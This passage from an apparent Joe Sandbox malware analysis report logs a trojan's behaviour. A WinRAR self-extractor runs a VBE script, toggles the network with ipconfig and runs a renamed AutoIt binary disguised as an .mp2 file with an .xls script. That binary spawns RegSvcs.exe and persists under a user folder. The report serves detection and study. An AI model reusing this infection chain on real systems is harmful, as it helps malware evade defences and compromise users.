                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0149D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0146DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0144FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014DDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014CDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01475AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014D1AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01433D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014E7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0144FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014A9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01431F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_013F3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_013F3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_014EFFB1
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 014AF290 appears 104 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01465130 appears 57 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0149EA12 appears 82 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0141B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01477E54 appears 110 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: String function: 00E9FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: String function: 00EA0DC0 appears 46 times
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: String function: 00CB57D8 appears 67 times
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: String function: 00CB57A5 appears 34 times
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: String function: 00CB6630 appears 31 times
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs u549ed5dEA.exe
                Source: u549ed5dEA.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@33/70@2/0
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00C9932C GetLastError,FormatMessageW,_wcslen,LocalFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EE194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EE1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EF5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EEDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00F04089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CAEBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | File created: C:\Users\user\ruum
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Command line argument: sfxname | 0_2_00CB454A
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Command line argument: sfxstime | 0_2_00CB454A
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Command line argument: STARTDLG | 0_2_00CB454A
                Source: u549ed5dEA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | File read: C:\Windows\win.ini
                Source: C:\Users\user\Desktop\u549ed5dEA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: u549ed5dEA.exe | ReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\u549ed5dEA.exeFile read: C:\Users\user\Desktop\u549ed5dEA.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\u549ed5dEA.exe "C:\Users\user\Desktop\u549ed5dEA.exe"
                Source: C:\Users\user\Desktop\u549ed5dEA.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 avqj.mp2 awggmrd.xls
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\ruum\avqj.mp2.exe "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\ruum\avqj.mp2.exe "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                Source: unknownProcess created: C:\Users\user\ruum\avqj.mp2.exe "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\u549ed5dEA.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xlsJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 avqj.mp2 awggmrd.xlsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Section loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\ruum\avqj.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\u549ed5dEA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: u549ed5dEA.exeStatic file information: File size 1323723 > 1048576
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: u549ed5dEA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: u549ed5dEA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: u549ed5dEA.exe
                Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: u549ed5dEA.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E85D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00E85D78
